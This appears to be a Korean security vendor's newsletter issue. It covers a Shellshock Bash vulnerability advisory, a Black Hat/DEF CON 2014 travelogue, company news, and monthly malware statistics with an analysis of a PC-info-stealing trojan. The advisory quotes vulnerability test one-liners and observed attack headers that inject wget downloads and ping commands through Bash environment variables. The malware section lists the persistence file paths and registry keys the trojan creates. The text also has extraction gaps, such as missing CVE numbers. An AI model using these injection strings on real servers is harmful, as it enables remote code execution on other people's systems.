초기의유닉스쉘인 본쉘 (Bourne shell) 과새로태어났다는뜻의영어 Born Again 의합성어로, 일반적으로 Bash 라는줄임말로쓰고, 배시 라고읽는다. Bash 는사용자가간단한텍스트기반의윈도에명령어를입력하면운영체제가이에따라동작할수있도록만드는 명령어해석기역할 을수행한다. GNU 프로젝트 GNU 프로젝트 (GNU project) 는 1983년 9월 27일유즈넷 net. unix-wizard 그룹을통해알려졌다. GNU 프로젝트는누구나자유롭게 실행, 복사, 수정, 배포 할수있고, 누구도그런권리를제한하면안된다는사용허가권 (License) 하에소프트웨어를배포한다. 1990년까지 GNU 시스템에는확장가능한문서편집기 ( 이맥스 ), 뛰어난최적화컴파일러 (GCC), 그리고표준유닉스배포판의핵심라이브러리와유틸리티가있었다. 1991년에리누스토르발스는유닉스호환의리눅스커널을작성하여 GPL 라이선스 (GNU 일반공중사용허가서 ) 하에배포했다. 1992년리눅스는 GNU 시스템과통합되었고, 이로써완전한공개운영체제가탄생되었다. 비공개유닉스시스템에도 GNU의구성요소들이본래의유닉스프로그램을대신하여들어있는경우도많다. ( * 출처 : Wikipedia 발췌 ) 미국국토안보부산하컴퓨터긴급대응팀 (US-CERT) 은지난 9월 24일홈페이지를통해 Bash 취약점에대해경고하고신속한패치적용을권고했다. Bash 사용여부및 Bash 버전확인방법운용중인서버또는서비스의 Bash 사용여부및해당취약점에영향을받는 Bash 버전의사용여부는아래의명령을통해서확인할수있다. $ cat /etc/shells /bin/sh /bin/csh /bin/ksh /usr/local/bin/tcsh /usr/local/bin/bash $ bash version GNU bash, version (1)-release (i386-unknownopenbsd4.3) Copyright (C) 2007 Free Software Foundation, Inc. 또한영향받는 Bash 버전에대한상세한정보는 US-CERT 등에서제공하는아래웹사이트를통해확인할수있다. 14

15 < 취약한 Bash 버전참고페이지 > Bash 코드인젝션취약점 (CVE / CVE ) [ 그림 1] 과같이환경변수의함수정의뒤에임의의실행코드를추가하면 Bash에서해당환경변수를임포트하는과정에서추가된실행코드가함께실행된다. bash-3.2$ env x='() { :;}; echo vulnerable bash -c echo this is a test vulnerable this is a test [ 그림 1] 간단한취약성테스트 (* 출처 : 레드햇블로그 SECURITY BLOG) 최초해당취약점 (CVE ) 을보완하는패치가제공되었으나파일을생성할수있는우회코드가확인되면서이를 CVE 의보안패치로대응하기에이르렀다 ([ 그림 2] 참고 ). # x.x.x.x 및 y.y.y.y는 IP 주소임 x.x.x.x/?referer=() { :; }; /bin/ping -c 1 y.y.y.y\x0d [ 그림 3] Bash 코드인젝션취약점대상스캔과정 따라서 [ 그림 4] 와같이일반적인웹환경의 /cgi-bin/ 디렉토리이하의 CGI 프로그램에접근하거나웹로그에서임의의실행코드인젝션행위가관찰되는지확인해볼필요가있다. GET /cgi-bin/bb-histlog.sh GET /cgi-bin/login.cgi GET /cgi-bin/web2cgi/getpass.cgi?lang=gb GET / HTTP/1.1" "() { :; }; /bin/ping -c 1 ip.addr [ 그림 4] 웹서버로그상의 Bash 코드인젝션취약점스캔행위 특히웹환경에서의취약점을갖는 Bash를구동하는웹 CGI 프로그램이확인되면, 공격자는검색엔진을통해해당프로그램을이용하고있는공격대상웹서버들을손쉽게확보할수있다. 이에자동화과정을통해다수의공격대상을기반으로한좀비네트워크구성의가능성이대두되고있다. 실제로 [ 그림 5] 와같이일반적인코드인젝션기법에많이이용되는공격기술이연동되고있는형태가계속해서보고되고있다. 외부의웹사이트로부터악의적인실행코드를다운로드할수있는 wget 실행명령어의코드인젝션을통해외부웹사이트로부터 DoS 기능을가진리눅스형악성코드 (V3 진단명 : Linux/CVE ) 및 IRCBot 기능을갖는펄스크립트형악성코드 (Perl/Shellbot) 를 /tmp 공간에저장하고실행하는형태의공격방식을취하고있다. Cookie: () { :; }; wget. User-Agent: () { :;}; wget.cookie:().{.:;.}; wget.host:().{.:;.}; wget..referer:().{.:;.};.wget [ 그림 5] wget 실행명령코드인젝션공격기법 [ 그림 2] Bash 취약점관련 CVE 및 CVE 패치안내 (* 출처 : US-CERT) 사용중인시스템에취약점 CVE 의존재여부는아래의명령어를통해간단히테스트할수있다. bash-3.2$ $ cd /tmp; rm -f /tmp/echo; env x=() { (a)=>\ bash -c echo date ; cat /tmp/echo 이외에도해당취약점존재여부를확인할수있는 Bash 취약성점검도구들이공개되어있다. 시스템관리자는이러한도구를이용해내부시스템의보안안정성을지속적으로점검할것을권고한다. Bash 코드인젝션취약점스캔공격자는 [ 그림 3] 과같은과정을통해원격코드실행을테스트함으로써해당취약점이포함된 Bash를구동하는웹 CGI 환경을지속적으로탐색하는것으로관찰되었다. 현재 Bash 취약점을이용해공격자는웹서버의콘텐츠및코드변경, 웹사이트변조, 사용자데이터유출및 DDoS 공격수행이가능한것으로알려져있다. 이외에도 SSH, DHCP 프로토콜등다양한환경하에서의 Bash 코드인젝션취약점공격시나리오도제기되고있는상황이다. Bash 코드인젝션취약점탐지건수지속적으로증가안랩은자사네트워크통합보안솔루션인트러스가드 (TrusGuard) 에해당취약점관련시그니처를적용하고모니터링한결과, [ 그림 6] 과같이 Bash 코드인젝션취약점의탐지건수가최근들어지속적으로증가하고있음을확인했다. 이는 Bash 코드인젝션취약점을점검할수있는스캔도구의증가와해당취약점을악용하는실제공격에기인한것으로추측할수있다. 당분간이러한추세가지속될것으로예상되는만큼, 유입되는공격에대한보안담당자들의지속적인모니터링및대응이필요하다. 15

16 트러스가드시그니처명배포당일 1 일후 2 일후 3 일후 4 일후 bash_code_injection (CVE ) 시그니처배포당일 1 일후 [ 그림 6] 안랩트러스가드의 Bash 코드인젝션취약점탐지건수추이 Bash 코드인젝션취약점대응방안 bash_code_injection (CVE ) 2 일후 3 일후 4 일후 우선, 사용중인시스템및서비스의 Bash 취약점영향여부를파악하 고관련보안업데이트를신속하게적용해야한다. 또한 Bash 코드인 젝션취약점을악용하는임의의원격코드실행공격에대한모니터링을강화하는한편, 침입차단시스템 (IPS) 을이용해공격피해를최소화하기위한조치를선행해야한다. 이밖에도취약한 Bash 버전을이용하는웹 CGI 프로그램을운영하는웹서버는없는지확인하고, 반드시필요한경우가아니라면웹 CGI 프로그램의서비스를중지하거나제거하는것도방법이다. 한편, 기존취약점이해결 ( 수정 ) 되었다하더라도공격자들은지속적으로우회공격방법을연구한다. 따라서 Bash 취약점과관련된패치를적용한이후라도당분간은해당취약점과관련된이슈를민감하게모 니터링함과동시에새로제공되는보안패치에대해서항상신속하게적용하여최신보안상태를유지할수있어야한다. 안랩은 Bash 취약점관련위협요소를지속적으로모니터링하고있으며관련권고문을신속하게배포해기업및일반사용자들의피해최소화를위해최선을다하고있다. <Bash 취약점관련국내보안권고사이트 > 1. 안랩보안권고 2. KISA 보안권고 writing_sequence= writing_sequence=21984 < 참고사이트 > Trend Micro Blog Red Hat Blog 16

17 IT & Life 사이버세계를수호하는열정과존중 세계적인정보보안콘퍼런스인 블랙햇 (Black Hat) 2014 와해킹대회 데프콘22(DEF CON 22) 가지난 8월 2일부터 7일까지미국라스베이거스에서개최됐다. 이번블랙햇 2014와데프콘22는 모든것은해킹당할수있다 는보안전문가들의우려를확인하는자리였다. 구글글래스를통한암호탈취부터자동차해킹, IoT 보안위협등의공격사례는물론, 급증하는사이버위협을줄이려면정부가보안취약점을사들여야한다 는주장까지파격의연속이었다. 지금부터한여름의좌충우돌블랙햇 / 데프콘탐방기를공개한다. 1 부 _ 블랙햇탐방기 : 한여름좌충우돌블랙햇탐방기 블랙햇 2014 는 8,000 여명의참관객및 147 개기업이참석해 124 개강연과트레이닝세션, 스폰서세션등으로진행됐다. 블랙햇 2014 에서 발표된전문적인내용은언론보도를통해상세히알려졌으므로, 이글에서는정보보안분야의큰축제현장의열기만공유하겠다. BlackHat USA 2014 홈페이지 블랙햇 2014와데프콘22의사전등록과숙소및항공권예약준비를마치고드디어라스베이거스로떠나는날이다. 인천공항의미국행비행기의탑승구주변에는여행이나출장등저마다의목적을안고있는사람들로가득했다. 그들중몇명의대학생들은며칠후데프콘22 해킹대회장에서공격과방어에열심인모습으로다시만날수있었다 ( 목표를향해최선을다한그들의열정에박수를!!). 13시간의긴여행끝에비행기는네바다주사막한가운데있는매캐런국제공항 (McCarran International Airport) 에도착했지만, 충분한수면덕분에다음날시차에대한별다른부작용 (?) 없이계획대로블랙햇행사장부터향하기위해숙소를나섰다. 이동거리를최소화하기위해블랙햇과데프콘이진행되는두호텔에서멀지않은곳에숙소를잡았던터라숙소에서목적지가훤히보이고, 버스로두정거장정도인 1.6 km의거리여서여유있게걸어다닐만하겠다고생각했다. 그러나이것이엄청난오산이었다는것을금세깨달았다. 숙소에서나온지불과 300m도채가기전에뜨거운햇살에온몸의수분이마르는경험을했기때문이다. 덕분에체중감량이라는뜻밖의덤까지얻을수있었다. 결국 낯선곳에서는남들하는대로따라하는것이정답 이라는경험에서전승된상식에따라행사장으로향하는무료트램 (Tram) 에햇살에 17

18 지친몸을실었다. 관광객들의호기심을자극하는다양한라스베이거스시내풍경을잠깐거쳐블랙햇 2014 USA가진행되는만달레이베이호텔 (Mandalay Bay Hotel & Casino) 앞에도착했다. 트램에서내리는대부분의사람들은비록말은하지않아도같은목적지를향하고있음을느낄수있었다. 관광에여념이없는주변사람들과달리다들등에백팩을짊어지고힘찬내딛는발걸음에서목적의식이느껴졌다고나할까. 앞서거니뒤서거니를반복하며휩쓸리듯만달레이베이호텔카지노를관통하여도착한곳은해양동물들이산다는 샤크리프아쿠아리움. 블랙햇이진행되는행사장의바로옆인이곳에행사를알리는대형현수막과스탠딩배너들이참가자들을반기고있었다, Welcome. BalckHat USA 2014 행사장입구 등록을위해길게줄을선사람들 2층에마련된등록부스에서사전예약한정보를입력하고출입증과가방, 기념품등을전달받았다. 자, 이제 100여개의세션탐험을시작할때다. 블랙햇은 2개층에거쳐수많은세션이동시에진행됐다. 행사가워낙큰호텔에서진행되다보니곳곳에세션을진행할수있는공간이마련되어있었다. 마침필자가선택한세션발표장이 2개층으로나뉘어있어생각보다이동거리가제법되었다. 언젠가이런대규모콘퍼런스에다시갈수있는기회가된다면그때는발표장사이의이동거리에대한계산정도는미리해두어야겠다. BalckHat USA 2014 출입증, 가방, 스케줄책자 세션장으로이동하는 8,000여명의물결이장관을이뤘다. 주변을신경쓰지않고지금당장필요하고궁금증을해소하러가는사람들의모습을보며, 문득이들이모두정보보안업계의협력자이자경쟁자라는생각에살짝긴장되기도했다. 하지만대한민국의보안전문가들도이곳에서자신있게우리의목소리를내고각국의보안전문가들과유기적으로협력하며사이버세계를지켜나가면좋겠다는생각이가장컸다. 세션을듣기위해질서정연하게늘어선사람들 ( 좌 ) / 기조연설중인댄기어 (Dan Geer) 인큐텔 (In-Q-Tel) CISO( 우 ) 18

19 세션발표자들도최선을다해발표를진행했고, 세션참석자들또한발표자들을정중하게대하는모습이인상적이었다. 발표중에간혹실수를하거나오류에의해시간이지연되어도참석자들은발표자가상황을정리하는동안조용히기다려주었다. 눈에띄게화려한시연이나기술과시가아니더라도예정된시연을성공적으로마치면힘찬박수와환호를보냈다. 사실이런문화에익숙하지않던탓에처음에는 뭘이런걸로박수를다치나? 하는생각이들었지만필자역시오후세션부터는적극적인반응을보냈다. 이러한청중의모습이발표자들에게큰힘이된다는것을다시금깨닫는시간이었다. 물론장난스러운면들도많았다. 블랙햇행사내내가장많이들었던말은 not long enough( 충분하지않다 ). 발표자들이사전준비를하는동안노트북화면이대형스크린에그대로나오는데, 발표자가로 세션발표를기다리는참석자들 그인을위해 8~9자리의암호를입력할때면여기저기서 not long enough 를외쳐댔다. 더길고복잡한암호를설정했어야한다는것. 시연을위한노트북이니대강이해하고넘어가줄만한데도누가보안을업으로하는사람들아니랄까봐소소한방심 (?) 까지놓치지않고장난스럽게지적을서슴지않았다. 세션이끝나자마자발표자를찾아가는참석자들 ( 좌 ) / 대표적인시큐리티그루 (Security Guru) 인브루스슈나이어 (Bruce Schneier)( 우 ) 블랙햇에서는발표정보를즉시제공해주지않는다는얘기를몇차례들은바있어스마트폰과카메라, 그리고여분의배터리와보조충전기까지챙겨두었다. 하지만진지한발표자들의목소리에 찰칵 하는셔터소리가폐가될듯하여서둘러셔터소리가나지않는앱을다운로드받았다. 그리고는발표슬라이드를부지런히찍었건만나중에보니블랙햇공식사이트에서오후부터대부분의관련자료를제공하는것이아닌가. 물론지금까지도공개되지않은발표내용도있긴하지만살짝맥빠지는순간이었다. 부지런히자료를수집했지만세션이끝난후대부분의정보가블랙햇공식사이트에서제공되었다. 19

20 수많은세션을듣기위해상당거리를이동하는참석자들을위해행사스폰서업체들이준비한오전과오후간식을제공했다. 그러나좌석이많지않은탓에대부분의사람들은이동하면서먹거나자유롭게카펫바닥에앉아간식을먹으며다음세션을확인하는모습이었다. 필자역시나름멋스럽게간이접시에빵을올리고한손에는포크를, 다른손에는따뜻한커피를들었지만도저히우아하게먹을수있는자세가나오지않았다. 결국체면보단실속. 접시와포크따윈던져버리고냅킨에빵을싸서먹으며서둘러커피를마셨다. 행사장한편에는블랙햇기념품을판매하고있었다. 주로티셔츠나점퍼, 가방, 배지, 인형, 모자등이었다. 그옆에는최신보안책자를조금저렴하게판매하고있었는데, 종종저자가직접현장에서사인을해주는모습도볼수있었다. 행사장에서판매되고있는각종티셔츠와서적 세션이진행되는발표장못지않게치열한곳이있었다. 스폰서기업들의전시가진행되는비즈니스홀 (Business Hall). 이곳에서다수의보안또는 IT 기업들이다양한이벤트를통해사람들의관심을유도하는한편그들의기술과메시지를전략적으로전달하느라여념이없었다. 최신보안기술동향을알기위해블랙햇을찾아온사람들이니이것저것질문이이어지는것은당연지사. 참석자들의관심에부응하기위해전시에참여한기업들은기업로고나메시지가적힌티셔츠를비롯해차량용 USB 충전기, 구강청결용캔디, 장난감레이저총, 그리고무선조종모형헬기나드론, 3D 프린터로즉석제작한모형까지다양한기념품을제공했다. 블랙햇 2014는전세계에서모여든보안관계자들이관심분야의발표세션을적극적으로찾아듣고, 발표자를비롯해같은관심사를가진사람들과함께논의하는자리였다. 수많은세션과열정적인사람들의모습을통해보안담당자들이다양한분야에관심을갖고연구하는것은당연한것이며, 그결과를어떻게보여주고해석하여업무에활용하는것이바로우리의몫이라는것을새삼확인할수있었다. 행사마지막날, 모든세션이끝나고출구로향하는길목에서블랙햇 2015를안내하는내용을볼수있었다. 내년 8월 1일부터진행될블랙햇 2015도누군가에게좋은기회가될것같다는생각을하며행사장을나섰다. Black Hat 2015 를예고하는현수막 20

21 2 부 _DEFCON 22 탐방기 : 해커들의성지를가다 DEFCON 홈페이지 앞서진행된블랙햇행사마지막날오후, 블랙햇행사장에서또다른콘퍼런스이자해킹대회인데프콘22의등록확인이진행됐다. 사전에블랙햇과동시에데프콘22의등록접수도했기때문에블랙햇의참가자대부분이데프콘으로이동할것을이미예상은했다. 막상등록확인을위해사람들이동시에몰려들었는데실로엄청났다. 하지만다들이런상황에익숙한듯, 차분하게순서를기다렸고덕분인지별다른문제없이생각보다빠른속도로등록확인이진행됐다. 등록확인후데프콘출입증, 안내책자와함께힙합음악 CD 2장과데프콘로고스티커등의기념품을건네받았다. 데프콘의출입증은블랙햇의그것과는전혀다른구조였다. 국내행사에서도흔히볼수있는형태의블랙햇출입증과는달리, 데프콘출입증은소형기판에초록색 LED를장착한형태로, AAA 건전지가 3개나들어있어상당히묵직하고현란한효과를연출했다. 또출입증목걸이줄에는 수직 과 수평 이라는한글단어와한자몇개가섞여있는것이인상적이었다. 필자의사진찍는기술이부족해독자들과공유할수가없어상당히아쉽다. 데프콘22 행사장으로들어서자블랙햇과는전혀다른분위기기가느껴졌다. 마치혼자만검은정장을차려입은채자유롭고개성강 DEFCON22 참가자들을위한기념품들 한히피문화가충만한사람들속으로불쑥걸어들어간듯한느낌이랄까. 형형색색으로염색한모히칸스타일부터왠지긴장하게만 드는스킨헤드스타일까지가지각색의헤어스타일을여기저기서볼수있었다. 한, 두개정도는기본으로다수의, 다양한형태의문신을한사람들도많았다. 마치할리우드영화속에서 해커라면이런모습! 이라는것처럼제시됐던이미지가 알고보니리얼리티에충실했던것이구나 하고느껴질정도였다. 행사장입구에서만난현수막마저하얀색과강렬한빨간색이왠지전투적인느낌을풍겨데프콘특유의분위기를고조시키는데일조했다. DEFCON22 행사장으로안내하는대형현수막 ( 좌 ) / DEFCON22 행사장입구 ( 우 ) 전혀다른세상에들어선이방인이된것같은느낌이잠깐현실이되었다. 행사장메인로비로들어서는순간빨간색티셔츠를입은덩치좋은진행요원에게입장을제지당한것이다. 알고보니출입증을목에걸고있어야한다는것. 잠깐당황했지만가방에고이모셔둔묵직한출입증을꺼내어목에걸자그진행요원은시원하게웃으며환영한다는인사로맞아주었다. 21

22 블랙햇과마찬가지로트랙 1~3 으로나뉘어진행되는세션장을지나자국내언론에서도자주등장하는 CTF(Capture The Flag) 행사장이눈에띄었다. CTF 행사장입구와전광판에표시된각팀의깃발현황 ( 좌 ) / CTF 행사장내부 ( 우 ) 이어둠속에서괜히반갑게느껴지는모습을발견했다. 인천공항에서라스베이거스행비행기를기다릴때만났던몇몇대학생들과모의해킹전문그룹의리더가각각대회참가자석에서집중하고있었다. 집중한그들의모습을표현하기에는 즐기고있다 는것이가장정확할것같다. 왠지뿌듯한그들의모습을휴대전화에담았는데, 나중에보니사진촬영을할수없다는안내판이있었다. 아무래도사진촬영이대회참가자들에게방해가되는모양이었다. 방해되지않도록카메라도, 휴대전화도얼른치워버리고그들의열정적인모습은눈으로만지켜보았다. 언젠가이들처럼이곳을찾을사람에게이자리, 이분위기를마음껏즐기고거침없이도전하여많은것을느끼고돌아가라고조언하고싶다. 자신이가진모든것을펼쳐후회없도록끝까지달려보는것, 열정으로하얗게불태우는것자체만으로도충분히의미있고소중한일이기때문이다. 지금까지그렇게해왔던, 그리고앞으로그렇게할수있는이들을위해진심어린박수를보내고싶다. 데프콘의세션분위기는다른행사들에비해좀더활력이넘친다는표현이어울릴것같다. 발표자들은힙합뮤지션같은액션과함께발표를진행했고청중들도자유로운환호와열정적인박수로이들에게호응했다. DEFCON22 발표장 ( 좌 ) / 발표가진행되는동안에도자유로운 DEFCON22( 우 ) 또세션발표가진행되는중간에행사운영진들이난입 (?) 하여 지금여기서뭐하냐, 그냥술이나한잔하자 며술을권하는모습이연출되기도했다. 처음에는발표자들도살짝당황했지만이내적응하고는난입자들과함께술을마시고발표를이어갔다. 참가자들또한이런상황을즐기며기다려주었다. 중요한것은발표자들도, 청중들도, 또행사운영진들도다소황당할수있는이러한상황속에서도결코본분은잊지않았다는점이다. 한바탕유쾌한순간이지난후에는다시열정적으로발표하고이에귀기울이는모습으로돌아와결코눈살을찌푸릴만한행동은나오지않았다. 마치자유와저항을이야기하면서도지킬것은지키는것이해커의올바른모습이라고말하는듯했다. LockPick Village 내부와 OpenCTF 모습 행사장한켠에 락픽빌리지 (LockPick Village) 라고이름붙은곳에서는 OpenCTF와실제자물쇠를여는이벤트가진행되고있었다. 먼발치에서봤을때는사람들이모여마치수학문제를풀고있는듯한분위기였는데, 가까이가서보니다들온신경을집중한채각종도구를동원해자물쇠를여느라여념이없었다. 데프콘이사이버공간에서의해킹만을다루는것은아니라고듣기는했지만다소생경한풍경이었다. 의외이기도하고, 재미있어보이기도했다. 무엇보다어렵고지루하게생각하기쉬운 보안 의개념을조금다른각도에서설명할수있는좋은아이디어라는생각이들었다. 22

23 LockPick 을위해준비된각종자물쇠들 ( 좌 ) / LockPick 에도전중인참가자들 ( 우 ) LockPick Village 내부의다양한코너들 세션발표장이아니더라도행사장곳곳에서자신들이연구한내용을자유롭게소개하는모습을볼수있었다. 이밖에도블랙햇처럼다수의기업들이전시와홍보를진행하는 벤더 (Vendors) 코너도있는가하면데프콘만의분위기를연출하는소소한코너들이눈길을끌었다. 여러사람들이모여서 FPS 게임을함께즐기는공간, 저항정신으로무장하게해줄듯한독특한티셔츠들을판매하는곳, 즉석에서문신을할수있는곳, 또 15달러만내면이방인의느낌에서벗어나현장분위기에맞는모히칸헤어스타일로바꿔주는코너등곳곳에서자유와저항의분위기가샘솟았다. 단지이들과같은공간에있는것만으로도특별히무언가를하지않아도억압과부조리에저항하는듯한기분을느낀것은비단필자만은아니었을것이다. 데프콘은우리주변에존재하는부조리하고취약한부분들을하나씩밝혀내고. 이제세상에위험이도사리고있으니알아서들피하세요 라는방관자적인태도가아니라위협으로부터우리스스로를지켜낼수있는방법을고민하고나누는자리였다. 우리가미처생각하지못했던수많은취약점이존재하고이를악용하는세력이등장하는순간나뿐만아니라우리모두가위험할수있으니더욱열심히연구하고지식과경험을공유하여대처해나가자는것이자연스럽게받아들여지는곳이었다. 데프콘현장을가득매웠던이들의열정을나와내동료들안에서도다시한번끌어낼수있도록더욱열심히뛰어야겠다. 보고배워야할것은많았지만시간은한정되어있는탓에다양한분야에서깊이연구해온사람들의발표를모두듣지못해행사가끝난지제법지난지금도두고두고아쉬움으로남아있다. 23

24 AHNLAB NEWS 안랩, 제 8 회금융정보보호콘퍼런스 참가 안랩이지난달 12일한국과학기술회관에서금융정보보호협의회와금융보안연구원이공동개최하는 제8회금융정보보호콘퍼런스 (FISCON 2014) 에참가했다. 이행사에서안랩은기존보안솔루션과의상호보완을통한 지능형지속위협 (APT) 의표준대응체계를소개했다. 안랩은행사장내부스에서 APT 방어솔루션 안랩트러스와처 ( 해외제품명 MDS) 와고성능네트워크보안솔루션인안랩트러스가드를집중적으로소개하는한편제품데모시연도진행했다. 안랩트러스와처 는 샌드박스를통한신변종악성오브젝트 ( 악성코드, 익스플로잇등 ) 에대한행위분석기술과 스피어피싱공격에흔히이용되는 MS 오피스파일, PDF, 한글 (hwp) 등과같은문서형익스플로잇을의심행위발생여부와무관하게탐지가능한 동적콘텐츠분석 (DICA: Dynamic Intelligent Content Analysis) 기술 시간차를두고다운로드된다수의컴포넌트가 PC 레벨에서재조합되어궁극적으로악성오브젝트 ( 악성코드, 익스플로잇등 ) 를생성하는지능형위협의실행을차단하고분석하는 실행보류 (execution holding) 기술을제공해점차정교해지고복잡해지는 지능화된타깃형공격 방식의차세대보안위협을방어한다. 강석균안랩국내사업총괄부문장은 안랩이금융정보보호콘퍼런스를통해 지능형지속위협 에대한표준대응체계를소개하고, 자사의제품을선보이게된것을의미있게생각한다 며, 안랩은각종보안사고를방지하기위해각고의노력을아끼지않는보안담당자들에게도움을줄수있는실질적인정보전달을위해최선을다할것 이라고밝혔다. 안랩 V3 모바일, 만점으로 10 회연속 AV-TEST 글로벌인증획득 안랩 V3 모바일 2.1( 이하 V3 모바일 ) 이독립보안제품성능평가기관인 AV-TEST( 가지난 7월실시한모바일보안제품테스트에서종합점수만점으로인증을획득했다. 한편, V3 모바일은최근 AV 컴패러티브와 AV-TEST 등양대글로벌 보안제품성능테스트기관이실시한모바일보안제품성능테스트에서모두 100% 의탐지율을기록했다. 이로써안랩은 2013년 1월부터시작된 AV-TEST 모바일보안제품테스트에서국내기업중유일하게 10회연속참가및인증을획득해모바일보안분야에서도글로벌기술력을인정받았다. 특히안랩은올해실시된총 4번의테스트 (1,3,5,7월) 의악성코드탐지율부문에서모두만점을획득하는성과를거뒀다. 또한최근실시된 7월테스트에서는악성코드탐지율, 성능영향, 추가기능등모든부문에서만점을획득했다. 이번테스트는 AV-TEST가시만텍, 맥아피등글로벌보안업체의 29개모바일보안제품을안드로이드환경에서진행했고, 이중안랩을비롯한맥아피등총 13개제품이만점을획득하여모바일보안분야리더그룹으로입지를굳혔다. V3 모바일은서구권위주의샘플이라는불리한상황에서도악성코드샘플을 100% 진단했다. 오진은기록하지않았고, 제품실행시단말기의성능에미치는영향부문에서도만점을받았다. 이밖에악성코드탐지이외에도난방지 (Anti-Theft) 기능, 스팸전화 문자방지등부가보안기능에서도추가점수를받아종합점수 13점만점에 13점을기록해인증을획득했다. [ 출처 : AV-TEST 웹사이트 ] 24

25 Statistics 보안통계와이슈 ASEC, 8 월악성코드통계및보안이슈발표 PC 정보, 온라인게임계정등개인정보탈취하는악성코드주의! 안랩시큐리티대응센터 (ASEC) 는 ASEC Report Vol.56 을통해지난 2014 년 8 월의보안통계및이슈를전했다. 8 월의주요보안이 슈를살펴본다. 트로이목마, PUP 제치고다시강세 ASEC이집계한바로는, 2014년 8월한달간탐지된악성코드수는 289만 7,479건으로나타났다. 이는전월 225만 7,733건에비해 63 만 9,746건증가한수치다. 한편 8월에수집된악성코드샘플수는 359만 6,157건으로집계됐다. [ 그림 2] 는 2014년 8월한달간유포된악성코드를주요유형별로집계한결과이다. 트로이목마 (Trojan) 계열의악성코드가 47.58% 로가장높은비중을차지했고, 불필요한프로그램인 PUP(Potentially Unwanted Program) 가 30.42%, 애드웨어 (Adware) 가 6.85% 로그뒤를이었다. [ 그림 1] 에서 탐지건수 란고객이사용중인 V3 등안랩의제품이탐 지한악성코드의수를의미하며, 샘플수집수 는안랩이자체적으로수집한전체악성코드의샘플수를의미한다. 2.03% 2.54% 6.85% 47.58% 5,000,000 4,000, % 30.42% 3,000,000 2,000,000 2,257,733 2,897,479 Trojan PUP etc Adware Worm Downloader 1,000, 월 [ 그림 1] 악성코드추이 2,611,553 1,705,345 3,519,765 7 월 탐지건수 3,596,157 8 월 샘플수집수 [ 그림 2] 주요악성코드유형 2014년 8월악성코드유포지로악용된도메인은 1,902개, URL은 3 만 918개로집계됐다. 또한 8월의악성도메인및 URL 차단건수는총 534만 3,498건이다. 악성도메인및 URL 차단건수는 PC 등시스템이악성코드유포지로악용된웹사이트에접속하는것을차단한수이다. 25

26 6,000,000 5,343,498 5,000,000 4,000,000 3,928,542 3,000,000 2,147,161 2,000,000 [ 그림 5] 감염 PC 통계사이트 1,000,000 악성코드가실행되면 [ 표 1] 과같이파일이생성된다. C:\WINDOWS\system32\6to432.dll 40,000 30,000 20,000 10, ,406 6 월 10,218 1,718 7 월 12,241 1,902 8 월 30,918 C:\WINDOWS\system32\102A(3~4자리숫자 + 1자리영문자 ).tmp C:\WINDOWS\system32\102B(3~4자리숫자 + 1자리영문자 ).tmp C:\WINDOWS\system32\6to432 C:\WINDOWS\system32\Vag.tbl C:\WINDOWS\system32\apci.sep C:\WINDOWS\system32\ias\sysprtj.prd [ 표 1] 파일생성정보그리고 [ 표 1] 에서생성된 6to432.dll과 Vag.tbl 파일을서비스에등록한다. 악성도메인 /URL 차단건수악성코드유포도메인수악성코드유포 URL 수 [ 그림 3] 악성코드유포도메인 / URL 탐지및차단건수 2014년 8월한달간탐지된모바일악성코드는 7만 4,413건으로나타났다. HKLM\SYSTEM\ControlSet001\Services\6to4\ImagePath "%SystemRoot%\System32\svchost.exe -k netsvcs" HKLM\SYSTEM\ControlSet001\Services\6to4\Start 0x2 Auto Load HKLM\SYSTEM\ControlSet001\Services\6to4\Parameters\ServiceDll "C:\WINDOWS\system32\6to432.dll" 250, ,993 HKLM\SYSTEM\ControlSet001\Services\6to4\Start 0x2 200,000 HKLM\SYSTEM\ControlSet001\Services\net81390\ImagePath "\??\C:\WINDOWS\system32\Vag.tbl" 150, ,000 74,678 74,413 HKLM\SYSTEM\ControlSet001\Services\net81390\Start 0x2 50, 월 7 월 8 월 [ 표 2] 레지스트리생성정보 dll 파일은프로세스에로드되어실행된다. [ 그림 6] 과같이 svchost. exe에로드되었음을확인할수있다. 로드된 dll 파일은특정사이트에접근하여파일을생성한다. [ 그림 4] 모바일악성코드추이 사용자 PC 정보를통계사이트로전송하는악성코드개인정보유출과관련된사건사고가증가하고있는가운데개인의 PC 정보를노린악성코드가발견되었다. 해당악성코드는사용자의 PC 정보를수집하여통계사이트로전송하고백신을무력화시킨다. 통계사이트로전송한정보는 [ 그림 5] 와같이감염된 PC의 IP 주소와국적, 감염일자, 운영체제, 보안소프트웨어상태등이다. [ 그림 6] svchost.exe 에로드된 6to432.dll 파일 26

27 [ 그림 7] 특정사이트에서내려받은파일 _ b.exe( 좌 ) 와 m.exe( 우 ) [ 그림 7] 과같이 b.exe 와 m.exe 파일을다운로드할때 tmp 파일이 생성된다. 생성된파일은 [ 그림 8] 1, 2 와같다. [ 그림 10] Vag.tbl 의파일종류 [ 그림 11] 과 Vag.tbl 파일은서비스에등록및실행되면서감염된 PC 의정보를후킹 (hooking) 한다. 후킹은일반적으로운영체제나응용소프트웨어등의각종 PC 프로그램에서소프트웨어구성요소간에발생하는함수호출, 메시지, 이벤트등을중간에바꾸거나가로채는명령, 방법, 기술이나행위를뜻한다. 공격대상의 PC 메모리정보, 키보드입력정보등의유출시에도사용된다. [ 그림 8] 특정사이트에서내려받은파일 _b.exe( 좌 ) 와 102A.tmp 파일 ( 우 ) - 1 [ 그림 11] 후킹되는모습 [ 그림 12] 수집된정보를전송하는과정 유출된감염 PC의정보는 [ 그림 12] 와같이 UDP(User Datagram Protocol) 를통해통계사이트로전송된다. 이러한정보는추후악성코드배포에악용될가능성이높아주의가필요하다. V3 제품에서는관련악성코드를다음과같이진단하고있다. <V3 제품군의진단명 > [ 그림 8] 특정사이트에서내려받은파일 _m.exe( 좌 ) 와 102B.tmp 파일 ( 우 ) B.tmp 파일은 [ 그림 9] 과같이사용자의 PC 정보를탈취하는파일 (Vag.tbl) 을생성한다. Trojan/Win32.OnlineGameHack ( ) Backdoor/Win32.Trojan ( ) Trojan/Win32.Hooker ( ) Trojan/Win32.Agent ( ) 정상시스템파일을변조하는온라인게임핵온라인게임핵 (OnlineGameHack) 악성코드는온라인게임계정을탈취하여금전취득을목적으로제작된다. 이때문에대부분의온라인게임업체는계정탈취를막기위해게임실행시별도의보안모듈이나백신으로보안사고를방지한다. 이러한보안기술을회피하기위해악성코드제작자들은특정서비스의로드나백신의동작을방해한다. 이번에발견된악성코드도백신의동작을방해하고윈도정상시스템파일을변조하여정상파일로위장하였다. [ 그림 9] 사용자의 PC 정보를탈취하는파일생성 생성된 Vag.tbl 파일의확장자는 